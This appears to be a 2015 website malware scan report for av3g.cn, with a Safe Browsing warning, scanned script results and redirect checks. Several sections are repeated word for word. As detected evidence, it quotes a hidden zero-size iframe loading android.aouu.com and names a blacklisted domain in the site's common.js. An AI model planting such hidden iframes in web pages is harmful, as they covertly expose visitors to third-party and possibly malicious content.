Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=av3g.cn
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://av3g.cn/ | 200 OK Content-Length: 62059 Content-Type: text/html | clean |
http://av3g.cn/js/jquery-1.4.1.min.js | 200 OK Content-Length: 71755 Content-Type: application/x-javascript | clean |
http://av3g.cn/js/common.js | 200 OK Content-Length: 5013 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: www.dy131.com ///<reference path="jquery-1.4.1.js">
$.Cookies = { get: function (n) { var dc = "; " + document.cookie + "; "; var coo = dc.indexOf("; " + n + "="); if (coo != -1) { var s = dc.substring(coo + n.length + 3, dc.length); return unescape(s.substring(0, s.indexOf("; "))); } else { return null; } }, s ...[4111 bytes skipped]... Hidden iFrame found. size: 0x0 style: hidden src: http://android.aouu.com <iframe src='http://android.aouu.com' style='width:0px;height:0px;display:none'> | ||
http://e.70e.com/js/cpc_wz_tw_stxw_diy.js | 200 OK Content-Length: 1557 Content-Type: application/x-javascript | clean |
http://f.ku63.com/f.asp?u=37497&m=3&n=&w=1000 | 200 OK Content-Length: 240 Content-Type: text/html | clean |
http://f.ku63.com/test404page.js | HTTP/1.1 302 Redirect Date: Tue, 03 Mar 2015 06:52:05 GMT Location: http://www.70e.com/err/404.html Server: Microsoft-IIS/7.5 Content-Length: 154 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET | clean |
http://www.70e.com/err/404.html | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://www.70e.com/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Tue, 03 Mar 2015 06:52:08 GMT Location: index.html Server: Microsoft-IIS/7.5 Content-Length: 108 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCRACRCD=HLJIKGFCBKFNLDJLDDCHHHOL; path=/ X-Powered-By: ASP.NET | clean |
http://www.70e.com/index.html | 200 OK Content-Length: 9358 Content-Type: text/html | clean |
http://www.70e.com/js/jquery1.9.0.js | 200 OK Content-Length: 267046 Content-Type: application/x-javascript | clean |
http://www.70e.com/js/common.js | 200 OK Content-Length: 686 Content-Type: application/x-javascript | clean |
http://www.70e.com/js/jquery.flexslider-min.js | 200 OK Content-Length: 11036 Content-Type: application/x-javascript | clean |
http://js.users.51.la/4690269.js | 200 OK Content-Length: 1945 Content-Type: application/x-javascript | clean |
http://webpresence.qq.com/getonline?Type=1&89936878:89936876:89936870:89936879:278070707:89936875:70556270:907907: | 200 OK Content-Length: 96 Content-Type: text/html | clean |
http://webpresence.qq.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://v.wqsph.net/showpage2.asp?u=13280 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://e.70e.com/js/cpc_wz_wz_diy.js | 200 OK Content-Length: 1542 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: av3g.cn
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 06:52:19 GMT
Server: nginx/1.0.15
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: av3g.cn
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 06:52:19 GMT
Server: nginx/1.0.15
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: av3g.cn
Referer: http://www.google.com/search?q=av3g.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: av3g.cn
Referer: http://www.google.com/search?q=av3g.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.